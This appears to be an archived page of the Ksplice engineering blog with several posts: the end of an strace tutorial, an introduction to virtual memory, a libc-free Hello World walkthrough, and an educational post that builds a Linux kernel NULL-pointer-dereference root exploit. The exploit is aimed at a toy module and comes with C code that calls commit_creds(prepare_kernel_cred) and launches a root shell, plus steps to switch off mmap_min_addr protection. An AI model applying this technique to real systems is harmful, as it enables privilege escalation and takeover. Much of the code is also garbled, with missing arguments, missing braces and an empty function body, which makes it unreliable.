 | 00020  61 63 74 73 20 57 48 45  52 45 20 69 64 20 3d 20  acts WHE RE id =  |
 | 00030  31 34 35 34                                       1454              |

and we see the whole query. It's both printed and in hex, in case it's binary. We could also get the whole thing with an option like -s 1024, but then we'd see all the data coming back via read() -- the use of -e write= lets us pick and choose.

Filtering the Output
Sometimes the full syscall trace is too much -- you just want to see what files the program touches, or when it reads and writes data, or some other subset. For this the -e trace= option was made. You can select a named suite of system calls like -e trace=file (for syscalls that mention filenames) or -e trace=desc (for read() and write() and friends, which mention file descriptors), or name individual system calls by hand. We'll use this option in the next example.

Child Processes
Sometimes the process you trace doesn't do the real work itself, but delegates it to child processes that it creates. Shell scripts and Make runs are notorious for taking this behavior to the extreme. If that's the case, you may want to pass -f to make strace "follow forks" and trace child processes, too, as soon as they're made.

For example, here's a trace of a simple shell script, without -f:

$ strace -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f4b68af5770) = 11948
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 11948
--- SIGCHLD (Child exited) @ 0 (0) --
wait4(-1, 0x7fffc3473604, WNOHANG, NULL) = -1 ECHILD (No child processes)

Not much to see here -- all the real work was done inside process 11948, the one created by that clone() syscall.

Here's the same script traced with -f (and the trace edited for brevity):

$ strace -f -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(Process 10738 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5a93f99770) = 10738
[pid 10682] wait4(-1, Process 10682 suspended

[pid 10738] open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
[pid 10738] dup2(3, 1)                  = 1
[pid 10738] close(3)                    = 0
[pid 10738] execve("/bin/ls", ["ls", ".git/objects/28"], [/* 25 vars */]) = 0
[... setup of C standard library omitted ...]
[pid 10738] stat(".git/objects/28", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
[pid 10738] open(".git/objects/28", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
[pid 10738] getdents(3, /* 40 entries */, 4096) = 2480
[pid 10738] getdents(3, /* 0 entries */, 4096) = 0
[pid 10738] close(3)                    = 0
[pid 10738] write(1, "04102fadac20da3550d381f444ccb5676"..., 1482) = 1482
[pid 10738] close(1)                    = 0
[pid 10738] close(2)                    = 0
[pid 10738] exit_group(0)               = ?
Process 10682 resumed
Process 10738 detached
<... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 10738
--- SIGCHLD (Child exited) @ 0 (0) ---

Now this trace could be a miniature education in Unix in itself -- future blog post? The key thing is that you can see ls do its work, with that open() call followed by getdents().

The output gets cluttered quickly when multiple processes are traced at once, so sometimes you want -ff, which makes strace write each process's trace into a separate file.

Use #2: Why/Where Is A Program Stuck?
Sometimes a program doesn't seem to be doing anything. Most often, that means it's blocked in some system call. Strace to the rescue.

$ strace -p 22067
Process 22067 attached - interrupt to quit
flock(3, LOCK_EX

Here it's blocked trying to take out a lock, an exclusive lock (LOCK_EX) on the file it's opened as file descriptor 3. What file is that?

$ readlink /proc/22067/fd/3

Aha, it's the file /tmp/foobar.lock. And what process is holding that lock?

$ lsof | grep /tmp/foobar.lock
 command   21856       price    3uW     REG 253,88       0 34443743 /tmp/foobar.lock
 command   22067       price    3u      REG 253,88       0 34443743 /tmp/foobar.lock

Process 21856 is holding the lock. Now we can go figure out why 21856 has been holding the lock for so long, whether 21856 and 22067 really need to grab the same lock, etc.

Other common ways the program might be stuck, and how you can learn more after discovering them with strace:

  • Waiting on the network. Use lsof again to see the remote hostname and port.
  • Trying to read a directory. Don't laugh -- this can actually happen when you have a giant directory with many thousands of entries. And if the directory used to be giant and is now small again, on a traditional filesystem like ext3 it becomes a long list of "nothing to see here" entries, so a single syscall may spend minutes scanning the deleted entries before returning the list of survivors.
  • Not making syscalls at all. This means it's doing some pure computation, perhaps a bunch of math. You're outside of strace's domain; good luck.

Uses #3, #4, ...
A post of this length can only scratch the surface of what strace can do in a sysadmin's toolbox. Some of my other favorites include

  • As a progress bar. When a program's in the middle of a long task and you want to estimate if it'll be another three hours or three days, strace can tell you what it's doing right now -- and a little cleverness can often tell you how far that places it in the overall task.
  • Measuring latency. There's no better way to tell how long your application takes to talk to that remote server than watching it actually read() from the server, with strace -T as your stopwatch.
  • Identifying hot spots. Profilers are great, but they don't always reflect the structure of your program. And have you ever tried to profile a shell script? Sometimes the best data comes from sending a strace -tt run to a file, and picking through to see when each phase of your program started and finished.
  • As a teaching and learning tool. The user/kernel boundary is where almost everything interesting happens in your system. So if you want to know more about how your system really works -- how about curling up with a set of man pages and some output from strace?


Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.


In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection
A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program.

This all has at least two important consequence for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>

int main() {
  mmap(0, 4096, PROT_READ|PROT_WRITE,
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;

Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
typedef int (*commit_creds_t)(struct cred *new)

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;
    int ret;

    while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;
    return NULL;

/* This function will be executed in kernel mode. */
void get_root(void) {

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);

  fprintf(stderr, "Something went wrong?\n");
  return 1;

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.


One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.

Monday Mar 29, 2010

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we're always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.

If you've ever programmed in C, you've probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded "Segmentation Fault". Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today's installment, we'll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I'll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!

What's in a pointer?

There's nothing fundamentally magical about pointers in C (or assembly, if that's your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer's memory. We can write a C program to print out a random pointer:

#include <stdio.h>
int main(int argc, char **argv) {
  printf("The argv pointer = %d\n", argv);
  return 0;

Which, if you run it on my machine, prints:

The argv pointer = 1680681096

(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that's just a notational thing. They're still just integers.)

NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it's just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.

But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

Diagram of Physical Memory Addresses
Mapping pointers directly to hardware memory

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you're browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It's actually even worse than that: a bug in IE can even take down the entire operating system.

This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other's memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program's address space to different pieces of physical memory.

A diagram of virtual memory

The world with Virtual Memory. Dark gray shows portions of the address space that refer to valid memory.


One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.

Because each application has its own address space, however, it is free to do with it as it wants. For instance, you're welcome to declare that NULL should be a valid address in your application. We refer to this as "mapping" the NULL page, because you're declaring that that area of memory should map to some piece of physical memory.

On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:

void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

Let's go through those arguments in order (All of this information comes from the man page):

This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
The length of the region the application wants to map. Memory can only be mapped in increments of a "page", which is 4k (4096 bytes) on x86 processors.
Short for "protection", this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process's address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we're going pass MAP_ANONYMOUS in flags, which indicates that we don't want to map a file, and fd is irrelevant.
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.

If we just want to be able to read and write the NULL pointer, we'll want to set addr to 0 and length to 4096, in order to map the first page of memory. We'll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we'll set them to -1 and 0 respectively.

Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!

(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you'll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

#include <sys/mman.h>
#include <stdio.h>

int main() {
  int *ptr = NULL;
  if (mmap(0, 4096, PROT_READ|PROT_WRITE,
      == MAP_FAILED) {
    perror("Unable to mmap(NULL)");
    fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
    return 1;
  printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
  *ptr = 17;
  printf("Now it's: %d\n", *ptr);
  return 0;

Next time, we'll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel's address space. And, I'll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!


Tuesday Mar 16, 2010

Hello from a libc-free world! (Part 1)

As an exercise, I want to write a Hello World program in C simple enough that I can disassemble it and be able to explain all of the assembly to myself.

This should be easy, right?

This adventure assumes compilation and execution on a Linux machine. Some familiarity with reading assembly is helpful.

Here's our basic Hello World program:

jesstess@kid-charlemagne:~/c$ cat hello.c
#include <stdio.h>

int main()
  printf("Hello World\n");
  return 0;

Let's compile it and get a bytecount:

jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10931 hello

Yikes! Where are 11 Kilobytes worth of executable coming from? objdump -t hello gives us 79 symbol-table entries, most of which we can blame on our using the standard library.

So let's stop using it. We won't use printf so we can get rid of our include file:

jesstess@kid-charlemagne:~/c$ cat hello.c
int main()
  char *str = "Hello World";
  return 0;

Recompiling and checking the bytecount:

jesstess@kid-charlemagne:~/c$ gcc -o hello hello.c
jesstess@kid-charlemagne:~/c$ wc -c hello
10892 hello

What? That barely changed anything!

The problem is that gcc is still using standard library startup files when linking. Want proof? We'll compile with -nostdlib, which according to the gcc man page won't "use the standard system libraries and startup files when linking. Only the files you specify will be passed to the linker".

jesstess@kid-charlemagne:~/c$ gcc -nostdlib -o hello hello.c
/usr/bin/ld: warning: cannot find entry symbol _start; defaulting to 00000000004000e8

Well, it's just a warning; let's check it anyway:

jesstess@kid-charlemagne:~/c$ wc -c hello
1329 hello

That looks pretty good! We got our bytecount down to a much more reasonable size (an order of magnitude smaller!)...

jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

...at the expense of segfaulting when it runs. Hrmph.

For fun, let's get our program to be actually runnable before digging into the assembly.

So what is this _start entry symbol that appears to be required for our program to run? Where is it usually defined if you're using libc?

From the perspective of the linker, by default _start is the actual entry point to your program, not main. It is normally defined in the crt1.o ELF relocatable. We can verify this by linking against crt1.o and noting that _start is now found (although we develop other problems by not having defined other necessary libc startup symbols):

# Compile the source files but don't link
jesstess@kid-charlemagne:~/c$ gcc -Os -c hello.c
# Now try to link
jesstess@kid-charlemagne:~/c$ ld /usr/lib/crt1.o -o hello hello.o
/usr/lib/crt1.o: In function `_start':
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:106: undefined reference to `__libc_csu_fini'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:107: undefined reference to `__libc_csu_init'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:113: undefined reference to `__libc_start_main'

This check conveniently also tells us where _start lives in the libc source: sysdeps/x86_64/elf/start.S for this particular machine. This delightfully well-commented file exports the _start symbol, sets up the stack and some registers, and calls __libc_start_main. If we look at the very bottom of csu/libc-start.c we see the call to our program's main:

result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);

and down the rabbit hole we go.

So that's what _start is all about. Conveniently, we can summarize what happens between _start and the call to main as "set up a bunch of stuff for libc and then call main'', and since we don't care about libc, let's just export our own _start symbol that just calls main and link against that:

jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

    call main

Compiling and running with our stub _start assembly file:

jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

Hurrah, our compilation problems go away! However, we still segfault. Why? Let's compile with debugging information and take a look in gdb. We'll set a breakpoint at main and step through until the segfault:

jesstess@kid-charlemagne:~/c$ gcc -g -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ gdb hello
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x4000f4: file hello.c, line 3.
(gdb) run
Starting program: /home/jesstess/c/hello

Breakpoint 1, main () at hello.c:5
5      char *str = "Hello World";
(gdb) step
6      return 0;
(gdb) step
7    }
(gdb) step
0x00000000004000ed in _start ()
(gdb) step
Single stepping until exit from function _start,
which has no line number information.
main () at helloint.c:4
4    {
(gdb) step
Breakpoint 1, main () at helloint.c:5
5      char *str = "Hello World";
(gdb) step
6      return 0;
(gdb) step
7    }
(gdb) step
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()

Wait, what? Why are we running through main twice? ...It's time to look at the assembly:

jesstess@kid-charlemagne:~/c$ objdump -d hello
hello:     file format elf64-x86-64

Disassembly of section .text:

00000000004000e8 <_start>:
4000e8: e8 03 00 00 00            callq 4000f0
4000ed: 90                        nop
4000ee: 90                        nop
4000ef: 90                        nop
00000000004000f0 :
4000f0: 55                        push %rbp
4000f1: 48 89 e5                  mov %rsp,%rbp
4000f4: 48 c7 45 f8 03 01 40      movq $0x400103,-0x8(%rbp)
4000fb: 00
4000fc: b8 00 00 00 00            mov $0x0,%eax
400101: c9                        leaveq
400102: c3                        retq

D'oh! Let's save a detailed examination of the assembly for later, but in brief: when we return from the callq to main we hit some nops and run right back into main. Since we re-entered main without putting a return instruction pointer on the stack as part of the standard prologue for calling a function, the second call to retq tries to pop a bogus return instruction pointer off the stack and jump to it and we bomb out. We need an exit strategy.

Literally. After the return from callq, push 1, the syscall number for SYS_exit, into %eax, and because we want to say that we're exiting cleanly, put a status of 0, SYS_exit's only argument, into %ebx. Then make the interrupt to drop into the kernel with int $0x80.

jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

    call main
    movl $1, %eax
    xorl %ebx, %ebx
    int $0x80
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello

Success! It compiles, it runs, and if we step through this new version under gdb it even exits normally.

Hello from a libc-free world!

Stay tuned for Part 2, where we'll walk through the parts of the executable in earnest and watch what happens to it as we add complexity, in the process understanding more about x86 linking and calling conventions and the structure of an ELF binary.



Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.


« July 2016